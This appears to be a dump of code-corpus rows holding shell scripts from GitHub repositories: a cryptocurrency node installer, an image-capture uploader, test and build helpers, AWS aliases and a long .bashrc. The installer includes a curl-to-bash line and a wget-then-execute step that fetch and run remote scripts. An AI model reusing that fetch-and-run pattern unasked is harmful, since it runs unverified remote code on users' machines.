blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
24c6b6408d314798a521c359e1c9e087e8a839d2 | Shell | dirty-harry/node-installer | /install-node.sh | UTF-8 | 1,086 | 3.1875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# =================== RUN THIS ========================
# bash <( curl -s https://raw.githubusercontent.com/thecrypt0hunter/node-installer/master/install-node.sh )"
# =====================================================
## Only tested with linux-x64 & Ubuntu 16 & 18 - feel free to do a PR to improve compatibility ##
arch="linux-x64" #(Most desktop distributions like CentOS, Debian, Fedora, Ubuntu and derivatives) ##
#arch="linux-arm" #(Linux distributions running on ARM like Raspberry Pi)
#arch="rhel.6-x64" #(Red Hat Enterprise Linux)
OS="Ubuntu*"
read -p "Which Coin (redstone, x42, impleum, city, stratis)? " coin
COINSERVICEINSTALLER="https://raw.githubusercontent.com/thecrypt0hunter/node-installer/master/install-coin.sh"
COINSERVICECONFIG="https://raw.githubusercontent.com/thecrypt0hunter/node-installer/master/config/config-${coin}.sh"
# Install Coins Service
wget ${COINSERVICEINSTALLER} -O /tmp/install-coin.sh
wget ${COINSERVICECONFIG} -O /tmp/config-${coin}.sh
chmod +x /tmp/install-coin.sh
/tmp/install-coin.sh -c ${coin} -a ${arch} -o ${OS}
| true |
10ba1f6d39055ea6b525122def0a6e86d1d177cb | Shell | nasebanal/nb-device4iot | /bin/get_image.sh | UTF-8 | 2,536 | 4.09375 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#========================================================================
# FILE NAME: get_image.sh
# FUNCTION: Get image and transfer it to AWS
# VERSION: 1.0
# AUTHOR: S.Yatsuzuka
#
# Copyright (C) 2016 NASEBANAL
#========================================================================
#======= Check Arguments =======
if [ $# -eq 0 -o $# -gt 2 ]; then
echo
echo "Usage: $0 <Mode> [Output File]"
echo
echo " <Mode>"
echo " 0: loop"
echo " other: one time"
echo
echo " [Output File]"
echo " log file name (optional)"
echo
exit 1
fi
#======= Get Arguments =======
MODE=$1
if [ $# -eq 2 ]; then
OUTPUT_FILE=$2
echo "OUTPUT_FILE = ${OUTPUT_FILE}"
fi
#======= Check NB Home =======
if [ ${#NB_HOME} = 0 ]; then
echo
echo "ERROR: NB_HOME isn't set as environment variable"
echo
exit 1
fi
#======= Check OpenCV Home =======
if [ ${#OPENCV_HOME} = 0 ]; then
echo
echo "ERROR: OPENCV_HOME isn't set as environment variable"
echo
exit 1
fi
#======= Check PID file =======
PIDFILE=${NB_HOME}/temp/pid.txt
if [ -e ${PIDFILE} ]; then
echo "INFO: pidfile exists"
exit 0
fi
echo $$ > ${PIDFILE}
#======= Get Parameter =======
source ${NB_HOME}/param/get_image.param
echo "CMD = ${NB_CMD}"
#======= Get Work Orders =======
#======= Call Program =======
while [ 1 ]
do
DATE=`date +%Y%m%d%H%M%S`
IMAGE_FILE=${DATE}.jpg
echo "IMAGE_FILE = ${IMAGE_FILE}"
if [ $# = 1 ]; then
${NB_CMD}
elif [ $# = 2 ]; then
${NB_CMD} > ${OUTPUT_FILE}
fi
#======= Create Meta file =======
DIRECTORY=${NB_HOME}/temp/${DATE}
META_FILE=${DATE}.meta
mkdir ${DIRECTORY}
cp ${NB_OUTPUT_IMG} ${DIRECTORY}/${IMAGE_FILE}
touch ${DIRECTORY}/${META_FILE}
#======= Transfer image files =======
if [ ${#NB_DEBUG} = 0 ]; then
scp -i ${NB_KEY_FILE} -r ${DIRECTORY} ${NB_REMOTE_USER}@${NB_REMOTE_HOST}:${NB_REMOTE_IMAGE_PATH}/waiting/
scp -i ${NB_KEY_FILE} ${NB_OUTPUT_IMG} ${NB_REMOTE_USER}@${NB_REMOTE_HOST}:${NB_REMOTE_IMAGE_PATH}/
else
scp -r ${DIRECTORY} ${NB_DEBUG_USER}@${NB_DEBUG_HOST}:${NB_DEBUG_IMAGE_PATH}/waiting/
scp ${NB_OUTPUT_IMG} ${NB_DEBUG_USER}@${NB_DEBUG_HOST}:${NB_DEBUG_IMAGE_PATH}/
fi
rm -rf ${DIRECTORY}
if [ ${MODE} -ne "0" ]; then
echo
break
fi
sleep ${NB_WAITING_TIME}
done
#======= Remove pid file =======
rm ${PIDFILE}
| true |
0062d59c381a8d459c3902024cc50551bd9e9a28 | Shell | dynaroars/gentree | /benchmarks/scripts/run_otter.sh | UTF-8 | 297 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -e
run(){
NAME=$1
mkdir -p res/$NAME
rm -rf 2/$NAME.cachedb
./igen4 -J2 -crwx -YF 2/$NAME --rep 11 -O res/$NAME/a_{i}.txt -j10 --rep-para 4
if [ "$2" = "full" ]; then
./igen4 -J2 -crwx -YF 2/$NAME -O res/$NAME/full.txt --full -j16
fi
}
run vsftpd notfull
run ngircd full | true |
105fd4b4aa5137e79029a430f8df87d132cc5049 | Shell | softdevteam/ykrustc | /compiler/rustc_codegen_cranelift/scripts/config.sh | UTF-8 | 877 | 2.859375 | 3 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-other-permissive",
"NCSA"
] | permissive | # Note to people running shellcheck: this file should only be sourced, not executed directly.
set -e
dylib=$(echo "" | rustc --print file-names --crate-type dylib --crate-name rustc_codegen_cranelift -)
if echo "$RUSTC_WRAPPER" | grep sccache; then
echo
echo -e "\x1b[1;93m=== Warning: Unset RUSTC_WRAPPER to prevent interference with sccache ===\x1b[0m"
echo
export RUSTC_WRAPPER=
fi
dir=$(cd "$(dirname "${BASH_SOURCE[0]}")"; pwd)
export RUSTC=$dir"/bin/cg_clif"
export RUSTDOCFLAGS=$linker' -Cpanic=abort -Zpanic-abort-tests '\
'-Zcodegen-backend='$dir'/lib/'$dylib' --sysroot '$dir
# FIXME fix `#[linkage = "extern_weak"]` without this
if [[ "$(uname)" == 'Darwin' ]]; then
export RUSTFLAGS="$RUSTFLAGS -Clink-arg=-undefined -Clink-arg=dynamic_lookup"
fi
export LD_LIBRARY_PATH="$(rustc --print sysroot)/lib:"$dir"/lib"
export DYLD_LIBRARY_PATH=$LD_LIBRARY_PATH
| true |
82ac63b79adbd7ea9f174c819cd973fd59cbca64 | Shell | sria91-rlox/rlox-4 | /util/test.sh | UTF-8 | 530 | 3.390625 | 3 | [] | no_license | #!/bin/bash
lox=$1
echo "$lox ..."
# Use perl to grab the expected output, marked with "// expect: "
expected=$( perl -ne 'print "$1\n" if /\/\/ expect: (.*)/; print "error: $1\n" if /\/\/ expect runtime error: (.*)/;' < "$lox" )
# Run the interpreter (--quiet suppresses the "Compiling/Finished/Running" messages)
actual=$( cargo run --quiet -- $lox --simple-errors 2>&1 )
# Compare the expected output to the actual output
colordiff -u --label "$lox (expected)" <(echo "$expected") --label "$lox (actual)" <(echo "$actual")
| true |
eb9834a72ad6526ddbd8f1854eda07c6bb015675 | Shell | ianrenton/config | /.zshrc | UTF-8 | 4,478 | 2.65625 | 3 | [] | no_license | source /etc/profile
# == History ==
export HISTFILE=~/.zsh_history
export HISTSIZE=50000
export SAVEHIST=50000
setopt APPENDHISTORY
setopt HIST_IGNORE_DUPS
setopt HIST_IGNORE_ALL_DUPS
setopt HIST_REDUCE_BLANKS
setopt HIST_IGNORE_SPACE
setopt HIST_NO_STORE
setopt HIST_VERIFY
setopt HIST_SAVE_NO_DUPS
setopt HIST_EXPIRE_DUPS_FIRST
setopt HIST_FIND_NO_DUPS
setopt NOBANGHIST
# == Auto-complete ==
autoload -Uz compinit
compinit
setopt COMPLETEALIASES
zstyle ':completion:*' list-colors "=(#b) #([0-9]#)*=36=31"
zstyle ':completion:*:descriptions' format '%U%d%u'
zstyle ':completion:*:warnings' format 'No matches for: %B%d%b'
zstyle ':completion:*' menu select=2 # show menu when at least 2 options.
zstyle ':completion::complete:cd::' tag-order '! users' - # do not auto complete user names
zstyle ':completion:*' tag-order '! users' # listing all users takes ages.
# speed up git autocomplete
__git_files() {
_wanted files expl 'local files' _files
}
# show waiting dots.
#expand-or-complete-with-dots() {
# echo -n "\e[1;34m.....\e[0m"
# zle expand-or-complete
# zle redisplay
#}
#zle -N expand-or-complete-with-dots
#bindkey "^I" expand-or-complete-with-dots
# == Corrections ==
#setopt CORRECTALL
# == Colors ==
export CLICOLORS=1
export LSCOLORS=Gxfxcxdxbxegedabagacad
solarized_green="\e[0;32m"
solarized_red="\e[0;31m"
solarized_blue="\e[0;34m"
solarized_yellow="\e[0;33m"
# == Extra prompt info ==
setopt PROMPT_SUBST
#autoload -Uz vcs_info
vcs_info_wrapper() {
vcs_info
if [ -n "$vcs_info_msg_0_" ]; then
echo "${vcs_info_msg_0_}$del"
fi
}
zstyle ':vcs_info:*' formats '%F{5}[%F{2}%b%F{5}]%f'
zstyle ':vcs_info:*' actionformats '%F{5}[%F{2}%b%F{3}|%F{1}%a%F{5}]%f'
zstyle ':vcs_info:(sv[nk]|bzr):*' branchformat '%b%F{1}:%F{3}%r'
# == Prompt config ==
export PS1="$(print '%{\e[0;32m%}%n%{\e[0;32m%}@%{\e[0;32m%}%m%{\e[0m%}:%{\e[0;34m%}%~%{\e[0m%}')$ "
# == Keyboard ==
#bindkey '^a' beginning-of-line # Home
#bindkey '^e' end-of-line # End
#bindkey '^R' history-incremental-search-backward
#bindkey "\e[Z" reverse-menu-complete # Shift+Tab
#bindkey "^[[3~" delete-char
#bindkey "^[3;5~" delete-char
# various fixes for HOME / END keys.
#bindkey "\e[1~" beginning-of-line
#bindkey "\e[4~" end-of-line
#bindkey "\e[5~" beginning-of-history
#bindkey "\e[6~" end-of-history
#bindkey "\e[7~" beginning-of-line
#bindkey "\e[8~" end-of-line
#bindkey "\eOH" beginning-of-line
#bindkey "\eOF" end-of-line
#bindkey "\e[H" beginning-of-line
#bindkey "\e[F" end-of-line
# if this goes wrong again try here: https://wiki.archlinux.org/index.php/Zsh
bindkey '^[[A' up-line-or-history # Fix cursor position on history recall
bindkey '^[[B' down-line-or-history # as on Debian these default to vi-*.
# 2x Ctrl-Z to kill with extreme prejudice, or stash the current command and put it back later if there is something in the buffer
fancy-ctrl-z () {
if [[ $#BUFFER -eq 0 ]]; then
kill -9 %+
zle redisplay
else
zle push-input
fi
}
zle -N fancy-ctrl-z
bindkey '^Z' fancy-ctrl-z
# == Aliases ==
if [ -f ~/.aliases ]; then
. ~/.aliases
fi
# ==Helpers ==
# Alt-S inserts "sudo " at the start of line.
insert_sudo () { zle beginning-of-line; zle -U "sudo " }
zle -N insert-sudo insert_sudo
bindkey "^[s" insert-sudo
# == tmp config helper ==
export ZSH_TMP="/tmp/zsh_$USER/"
mkdir -p $ZSH_TMP
chmod 700 $ZSH_TMP
# == Current directory ==
export ZSH_CURRENT_PATH="$ZSH_TMP/.zshpwd"
function chpwd {
echo $(pwd) >! $ZSH_CURRENT_PATH
if [[ -t 1 ]] ; then print -Pn "\e]2;%~\a" ; fi
}
if [[ -f $ZSH_CURRENT_PATH ]]; then
cd "$(cat $ZSH_CURRENT_PATH)"
fi
# == Other options ==
REPORTTIME=1 # notify on slow commands
# == Any local changes? ==
[[ -r "$HOME/.zshrc_local" ]] && source "$HOME/.zshrc_local"
# colour ls
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
fi
# == is ssh? ==
if [ -n "$SSH_CLIENT" ] || [ -n "$SSH_TTY" ]; then
SESSION_TYPE=ssh
else
case $(ps -o comm= -p $PPID) in
sshd|*/sshd) SESSION_TYPE=ssh;;
esac
fi
if [ -n "$SUDO_USER" ] || [ -n "$SUDO_COMMAND" ]; then
SESSION_TYPE=sudo
fi
# fortune, because fortune
fortune &&
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/var/lib/gems/1.8/bin:/usr/local/rvm/bin:/home/ian/.local/bin
alias rake="bundle exec rake"
alias md="mkdir"
alias update="sudo apt-get update && sudo apt-get upgrade"
| true |
7bd503d01caf251ea160ed993c2274169a5648b1 | Shell | agoila/udacity-dlnd-aws | /aws-alias.sh | UTF-8 | 1,695 | 2.875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#This file has been modified from the original file found here: https://github.com/fastai/courses/blob/master/setup/aws-alias.sh
alias aws-get-g2='export instanceId=`aws ec2 describe-instances --filters "Name=instance-state-name,Values=stopped,Name=instance-type,Values=g2.2xlarge" --query "Reservations[0].Instances[0].InstanceId"` && echo $instanceId'
alias aws-start='aws ec2 start-instances --instance-ids $instanceId && aws ec2 wait instance-running --instance-ids $instanceId && export instanceIp=`aws ec2 describe-instances --filters "Name=instance-id,Values=$instanceId" --query "Reservations[0].Instances[0].PublicIpAddress"` && echo $instanceIp'
alias aws-ip='export instanceIp=`aws ec2 describe-instances --filters "Name=instance-id,Values=$instanceId" --query "Reservations[0].Instances[0].PublicIpAddress"` && echo $instanceIp'
alias aws-ssh='ssh -i ~/.ssh/aws-key-udacity-dl.pem ubuntu@$instanceIp'
alias aws-stop='aws ec2 stop-instances --instance-ids $instanceId'
if [[ `uname` == *"CYGWIN"* ]]
then
# This is cygwin. Use cygstart to open the notebook
alias aws-nb='cygstart http://$instanceIp:8888'
fi
if [[ `uname` == *"Linux"* ]]
then
# This is linux. Use xdg-open to open the notebook
alias aws-nb='xdg-open http://$instanceIp:8888'
fi
if [[ `uname` == *"Darwin"* ]]
then
# This is Mac. Use open to open the notebook
alias aws-nb='open http://$instanceIp:8888'
fi
# Modify this to point to your AWS instanceId. Check your AWS console/instance page.
# For California,
# https://us-west-1.console.aws.amazon.com/ec2/v2/home?region=us-west-1#Instances:sort=instanceId
export instanceId=i-9aa9c282
| true |
a5aec63498932f6adaf50fb58ef83338bbc4811b | Shell | xumc/study | /shell/delete_files.sh | UTF-8 | 181 | 3.328125 | 3 | [] | no_license | for filename in `ls`
do
if test -d $filename
then
b=0
else
a=$(ls -l $filename | awk '{ print $5 }')
if test $a -eq 0
then
rm $filename
fi
fi
done
| true |
eb4f558ac5141d336d46c6d0f229a322963b0327 | Shell | gwl0913/testRepository | /flowCtl.sh | UTF-8 | 694 | 3.546875 | 4 | [] | no_license | #!/bin/bash
# if 后有空格 [ ]两侧有空格
if [ $1 -eq 1 ]
then
echo eq1
elif [ $1 -eq 2 ]
then
echo 'eq2'
fi
# case
# case $变量名 in
case $1 in
1)
echo one
;;
2)
echo tow
;;
*)
echo default
;;
esac
# for(( ))
# do
# done
s=0
for((i=1;i<5;i++))
do
s=$[$s+$i]
done
echo "for add result: $s"
# for p in list
for p in $@
do
echo "input paramer $p"
done
# for p in $*
# do
# echo "input paramer $p"
# done
# for p in "$@"
# do
# echo "input paramer $p"
# done
# for p in "$*"
# do
# echo "input paramer $p"
# done
# whie [ ]
s=0
i=1
while [ $i -le 100 ]
do
s=$[$s + $i]
i=$[$i + 1]
done
echo "1 plus to 100 is: $s" | true |
9be092595a3684c459bbe5f66e9a69aeef113ef5 | Shell | conda-forge/openexr-feedstock | /recipe/build.sh | UTF-8 | 361 | 2.53125 | 3 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | #!/bin/bash
mkdir build
cd build
export CFLAGS="$CFLAGS -D__STDC_FORMAT_MACROS"
export CXXFLAGS="$CXXFLAGS -D__STDC_FORMAT_MACROS"
cmake ${CMAKE_ARGS} -DCMAKE_INSTALL_PREFIX=$PREFIX \
-DBUILD_SHARED_LIBS=ON \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_LIBDIR=lib \
-DOPENEXR_LIB_SUFFIX="" \
..
make -j${CPU_COUNT}
make install | true |
b421748d885ae32457530c418e6b56df9c88b86c | Shell | bradyrx/dotfiles | /.bashrc | UTF-8 | 27,317 | 3.328125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
#.bashrc
#-----------------------------------------------------------------------------#
# This file should override defaults in /etc/profile in /etc/bashrc.
# Check out what is in the system defaults before using this, make sure your
# $PATH is populated. To SSH between servers without password use:
# https://www.thegeekstuff.com/2008/11/3-steps-to-perform-ssh-login-without-password-using-ssh-keygen-ssh-copy-id/
# A few notes:
# * Prefix key for issuing SSH-session commands is '~'; 'exit' sometimes doesn't work (perhaps because
# if aliased or some 'exit' is in $PATH
# C-d/'exit' -- IF AVAILABLE, exit SSH session
# ~./~C-z -- Exit SSH session
# ~& -- Puts SSH into background
# ~# -- Gives list of forwarded connections in this session
# ~? -- Gives list of these commands
# * Extended globbing explanations, see:
# http://mywiki.wooledge.org/glob
# * Use '<package_manager> list' for MOST PACKAGE MANAGERS to see what is installed
# e.g. brew list, conda list, pip list
#-----------------------------------------------------------------------------#
# Bail out, if not running interactively (e.g. when sending data packets over with scp/rsync)
# Known bug, scp/rsync fail without this line due to greeting message:
# 1) https://unix.stackexchange.com/questions/88602/scp-from-remote-host-fails-due-to-login-greeting-set-in-bashrc
# 2) https://unix.stackexchange.com/questions/18231/scp-fails-without-error
[[ $- != *i* ]] && return
# clear # first clear screen
# Prompt
# Keep things minimal, just make prompt boldface so its a bit more identifiable
if [ -z "$_ps1_set" ]; then # don't overwrite modifications by supercomputer modules, conda environments, etc.
export PS1='\[\033[1;37m\]\h[\j]:\W\$ \[\033[0m\]' # prompt string 1; shows "<comp name>:<work dir> <user>$"
_ps1_set=1
fi
# Message constructor; modify the number to increase number of dots
# export PS1='\[\033[1;37m\]\h[\j]:\W \u\$ \[\033[0m\]' # prompt string 1; shows "<comp name>:<work dir> <user>$"
# style; the \[ \033 chars are escape codes for changing color, then restoring it at end
# see: https://stackoverflow.com/a/28938235/4970632
# also see: https://unix.stackexchange.com/a/124408/112647
_bashrc_message() {
printf "${1}$(printf '.%.0s' $(seq 1 $((29 - ${#1}))))"
}
#-----------------------------------------------------------------------------#
# Bash_it config
#-----------------------------------------------------------------------------#
# Path to the bash it configuration
export BASH_IT=$HOME/.bash_it
export BASH_IT_THEME='sexy'
export GIT_HOSTING='git@github.com'
export EDITOR="vim"
export GIT_EDITOR='vim'
# Don't check mail when opening terminal.
unset MAILCHECK
source $BASH_IT/bash_it.sh
#-----------------------------------------------------------------------------#
# Settings for particular machines
# Custom key bindings and interaction
#-----------------------------------------------------------------------------#
# Reset all aliases
# Very important! Sometimes we wrap new aliases around existing ones, e.g. ncl!
unalias -a
# Flag for if in MacOs
[[ "$OSTYPE" == "darwin"* ]] && _macos=true || _macos=false
# Python stuff
# Must set PYTHONBUFFERED or else running bash script that invokes python will
# prevent print statements from getting flushed to stdout until exe finishes
unset PYTHONPATH
export PYTHONUNBUFFERED=1
# First, the path management
# _bashrc_message "Variables and modules"
if $_macos; then
# Defaults, LaTeX, X11, Homebrew, Macports, PGI compilers, and local compilations
# NOTE: Added ffmpeg with sudo port install ffmpeg +nonfree
# NOTE: Added matlab as a symlink in builds directory
# NOTE: Install gcc and gfortran with 'port install gcc6' then
# 'port select --set gcc mp-gcc6' (check 'port select --list gcc')
export PATH=$(tr -d $'\n ' <<< "
$HOME/builds/ncl-6.5.0/bin:$HOME/builds/matlab/bin:
/opt/pgi/osx86-64/2018/bin:
/usr/local/bin:
/opt/local/bin:/opt/local/sbin:
/opt/X11/bin:/Library/TeX/texbin:
/usr/bin:/bin:/usr/sbin:/sbin:
")
export LM_LICENSE_FILE="/opt/pgi/license.dat-COMMUNITY-18.10"
export PKG_CONFIG_PATH="/opt/local/bin/pkg-config"
# Add RVM to PATH for scripting. Make sure this is the last PATH variable change.
# WARNING: Need to install with rvm! Get endless issues with MacPorts/Homebrew
# versions! See: https://stackoverflow.com/a/3464303/4970632
# Test with: ruby -ropen-uri -e 'eval open("https://git.io/vQhWq").read'
# Install rvm with: \curl -sSL https://get.rvm.io | bash -s stable --ruby
if [ -d ~/.rvm/bin ]; then
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
export PATH="$PATH:$HOME/.rvm/bin"
rvm use ruby 1>/dev/null
fi
# NCL NCAR command language, had trouble getting it to work on Mac with conda
# NOTE: By default, ncl tried to find dyld to /usr/local/lib/libgfortran.3.dylib;
# actually ends up in above path after brew install gcc49; and must install
# this rather than gcc, which loads libgfortran.3.dylib and yields gcc version 7
# Tried DYLD_FALLBACK_LIBRARY_PATH but it screwed up some python modules
alias ncl='DYLD_LIBRARY_PATH="/opt/local/lib/libgcc" ncl' # fix libs
export NCARG_ROOT="$HOME/builds/ncl-6.5.0" # critically necessary to run NCL
else
case $HOSTNAME in
# Cheyenne supercomputer, any of the login nodes
cheyenne*)
# Edit library path
# Set tmpdir following direction of: https://www2.cisl.ucar.edu/user-support/storing-temporary-files-tmpdir
export LD_LIBRARY_PATH="/glade/u/apps/ch/opt/netcdf/4.6.1/intel/17.0.1/lib:$LD_LIBRARY_PATH"
export TMPDIR=/glade/scratch/$USER/tmp
# Load some modules
# NOTE: Use 'qinteractive' for interactive mode
_loaded=($(module --terse list 2>&1)) # already loaded
_toload=(nco tmux cdo ncl)
for _module in ${_toload[@]}; do
if [[ ! " ${_loaded[@]} " =~ "$_module" ]]; then
module load $_module
fi
done
;; *) echo "\"$HOSTNAME\" does not have custom settings. You may want to edit your \".bashrc\"."
;; esac
fi
# Access custom executables and git repos
# e.g., ack.
export PATH=$(tr -d $'\n ' <<< "
$HOME/bin:
$PATH
")
# Save path before setting up conda
# Brew conflicts with anaconda (try "brew doctor" to see)
alias brew="PATH=\"$PATH\" brew"
# Matplotlib stuff
# May be necessary for rendering fonts in ipython notebooks
# See: https://github.com/olgabot/sciencemeetproductivity.tumblr.com/blob/master/posts/2012/11/how-to-set-helvetica-as-the-default-sans-serif-font-in.md
export MPLCONFIGDIR=$HOME/.matplotlib
# printf "done\n"
#-----------------------------------------------------------------------------#
# Anaconda stuff
#-----------------------------------------------------------------------------#
unset _conda
if [ -d "$HOME/anaconda3" ]; then
_conda='anaconda3'
elif [ -d "$HOME/miniconda3" ]; then
_conda='miniconda3'
else # Case for CU Summit computer.
_conda='projects/miniconda3'
fi
if [ -n "$_conda" ] && ! [[ "$PATH" =~ "conda" ]]; then # above doesn't work, need to just check path
# For info on what's going on see: https://stackoverflow.com/a/48591320/4970632
# The first thing creates a bunch of environment variables and functions
# The second part calls the 'conda' function, which calls an activation function, which does the
# whole solving environment thing
# If you use the '. activate' version, there is an 'activate' file in bin
# that does these two things
# _bashrc_message "Enabling conda"
source $HOME/$_conda/etc/profile.d/conda.sh # set up environment variables
CONDA_CHANGEPS1=false conda activate # activate the default environment, without changing PS1
avail() {
local current latest
[ $# -ne 1 ] && echo "Usage: avail PACKAGE" && return 1
current=$(conda list "$1" | grep '\b'"$1"'\b' | awk 'NR == 1 {print $2}')
latest=$(conda search "$1" | grep '\b'"$1"'\b' | awk 'END {print $2}')
echo "Package: $1"
echo "Current version: $current"
echo "Latest version: $latest"
}
# printf "done\n"
fi
#-----------------------------------------------------------------------------#
# Wrappers for common functions
#-----------------------------------------------------------------------------#
# _bashrc_message "Functions and aliases"
# Neat function that splits lines into columns so they fill the terminal window
_columnize() {
local cmd
local input output final
local tcols ncols maxlen nlines
[ $# -eq 0 ] && input=$(cat /dev/stdin) || input="$1"
! $_macos && cmd=wc || cmd=gwc
ncols=1 # start with 1
tcols=$(tput cols)
maxlen=0 # initial
nlines=$(printf "$input" | $cmd -l) # check against initial line count
output="$input" # default
while true; do
final="$output" # record previous output, this is what we will print
output=$(printf "$input" | xargs -n$ncols | column -t)
maxlen=$(printf "$output" | $cmd -L)
# maxlen=$(printf "$output" | awk '{print length}' | sort -nr | head -1) # or wc -L but that's unavailable on mac
[ $maxlen -gt $tcols ] && break # this time *do not* print latest result, will result in line break due to terminal edge
[ $ncols -gt $nlines ] && final="$output" && break # test *before* increment, want to use that output
# echo terminal $tcols ncols $ncols nlines $nlines maxlen $maxlen
let ncols+=1
done
printf "$final"
}
# Environment variables
export EDITOR=vim # default editor, nice and simple
export LC_ALL=en_US.UTF-8 # needed to make Vim syntastic work
# #-----------------------------------------------------------------------------#
# # SHELL BEHAVIOR, KEY BINDINGS
# #-----------------------------------------------------------------------------#
# # Readline/inputrc settings
# # Use Ctrl-R to search previous commands
# # Equivalent to putting lines in single quotes inside .inputrc
# # bind '"\C-i":glob-expand-word' # expansion but not completion
# _setup_bindings() {
# complete -r # remove completions
# bind -r '"\C-i"'
# bind -r '"\C-d"'
# bind -r '"\C-s"' # to enable C-s in Vim (normally caught by terminal as start/stop signal)
# bind 'set disable-completion off' # ensure on
# bind 'set completion-ignore-case on' # want dat
# bind 'set completion-map-case on' # treat hyphens and underscores as same
# bind 'set show-all-if-ambiguous on' # one tab press instead of two; from this: https://unix.stackexchange.com/a/76625/112647
# bind 'set menu-complete-display-prefix on' # show string typed so far as 'member' while cycling through completion options
# bind 'set completion-display-width 1' # easier to read
# bind 'set bell-style visible' # only let readlinke/shell do visual bell; use 'none' to disable totally
# bind 'set skip-completed-text on' # if there is text to right of cursor, make bash ignore it; only bash 4.0 readline
# bind 'set visible-stats off' # extra information, e.g. whether something is executable with *
# bind 'set page-completions off' # no more --more-- pager when list too big
# bind 'set completion-query-items 0' # never ask for user confirmation if there's too much stuff
# bind 'set mark-symlinked-directories on' # add trailing slash to directory symlink
# bind '"\C-i": menu-complete' # this will not pollute scroll history; better
# bind '"\e-1\C-i": menu-complete-backward' # this will not pollute scroll history; better
# bind '"\e[Z": "\e-1\C-i"' # shift tab to go backwards
# bind '"\C-l": forward-char'
# bind '"\C-s": beginning-of-line' # match vim motions
# bind '"\C-e": end-of-line' # match vim motions
# bind '"\C-h": backward-char' # match vim motions
# bind '"\C-w": forward-word' # requires
# bind '"\C-b": backward-word' # by default c-b moves back one word, and deletes it
# bind '"\eOP": menu-complete' # history
# bind '"\eOQ": menu-complete-backward' # history
# bind '"\C-j": next-history'
# bind '"\C-k": previous-history' # history
# bind '"\C-j": next-history'
# bind '"\C-p": previous-history' # history
# bind '"\C-n": next-history'
# stty werase undef # no more ctrl-w word delete function; allows c-w re-binding to work
# stty stop undef # no more ctrl-s
# stty eof undef # no more ctrl-d
# }
# _setup_bindings 2>/dev/null # ignore any errors
# # Shell Options
# # Check out 'shopt -p' to see possibly interesting shell options
# # Note diff between .inputrc and .bashrc settings: https://unix.stackexchange.com/a/420362/112647
# _setup_opts() {
# # Turn off history expansion, so can use '!' in strings; see: https://unix.stackexchange.com/a/33341/112647
# set +H
# # No more control-d closing terminal
# set -o ignoreeof
# # Disable start/stop output control
# stty -ixon # note for putty, have to edit STTY value and set ixon to zero in term options
# # Exit this script when encounter error, and print each command; useful for debugging
# # set -ex
# # Various shell options
# shopt -s cmdhist # save multi-line commands as one command in shell history
# shopt -s checkwinsize # allow window resizing
# shopt -u nullglob # turn off nullglob; so e.g. no null-expansion of string with ?, * if no matches
# shopt -u extglob # extended globbing; allows use of ?(), *(), +(), +(), @(), and !() with separation "|" for OR options
# shopt -u dotglob # include dot patterns in glob matches
# shopt -s direxpand # expand dirs
# shopt -s dirspell # attempt spelling correction of dirname
# shopt -s cdspell # spelling errors during cd arguments
# shopt -s cdable_vars # cd into shell variable directories, no $ necessary
# shopt -s nocaseglob # case insensitive
# shopt -s autocd # typing naked directory name will cd into it
# shopt -s no_empty_cmd_completion # no more completion in empty terminal!
# shopt -s histappend # append to the history file, don't overwrite it
# shopt -s cmdhist # save multi-line commands as one command
# shopt -s globstar # **/ matches all subdirectories, searches recursively
# shopt -u failglob # turn off failglob; so no error message if expansion is empty
# # shopt -s nocasematch # don't want this; affects global behavior of case/esac, and [[ =~ ]] commands
# # Related environment variables
# export HISTIGNORE="&:[ ]*:return *:exit *:cd *:source *:. *:bg *:fg *:history *:clear *" # don't record some commands
# export PROMPT_DIRTRIM=2 # trim long paths in prompt
# export HISTSIZE=50000
# export HISTFILESIZE=10000 # huge history -- doesn't appear to slow things down, so why not?
# export HISTCONTROL="erasedups:ignoreboth" # avoid duplicate entries
# }
# _setup_opts 2>/dev/null # ignore if option unavailable
#-----------------------------------------------------------------------------#
# General utilties
#-----------------------------------------------------------------------------#
# Configure ls behavior, define colorization using dircolors
if [ -r "$HOME/.dircolors.ansi" ]; then
$_macos && _dc_command=gdircolors || _dc_command=dircolors
eval "$($_dc_command $HOME/.dircolors.ansi)"
fi
$_macos && _ls_command=gls || _ls_command=ls
alias ls="$_ls_command --color=always -AF" # ls useful (F differentiates directories from files)
alias ll="$_ls_command --color=always -AFhl" # ls "list", just include details and file sizes
alias la="$_ls_command --color=always -AFla"
alias lh="$_ls_command --color=always -AFlhtr"
alias cd="cd -P" # don't want this on my mac temporarily
alias ctags="ctags --langmap=vim:+.vimrc,sh:+.bashrc" # permanent lang maps
log() {
while ! [ -r "$1" ]; do
echo "Waiting..."
sleep 2
done
tail -f "$1"
}
# Standardize less/man/etc. colors
# Used this: https://unix.stackexchange.com/a/329092/112647
export LESS="--RAW-CONTROL-CHARS"
[ -f ~/.LESS_TERMCAP ] && . ~/.LESS_TERMCAP
if hash tput 2>/dev/null; then
export LESS_TERMCAP_md=$'\e[1;33m' # begin blink
export LESS_TERMCAP_so=$'\e[01;44;37m' # begin reverse video
export LESS_TERMCAP_us=$'\e[01;37m' # begin underline
export LESS_TERMCAP_me=$'\e[0m' # reset bold/blink
export LESS_TERMCAP_se=$'\e[0m' # reset reverse video
export LESS_TERMCAP_ue=$'\e[0m' # reset underline
export GROFF_NO_SGR=1 # for konsole and gnome-terminal
fi
# Information on directories
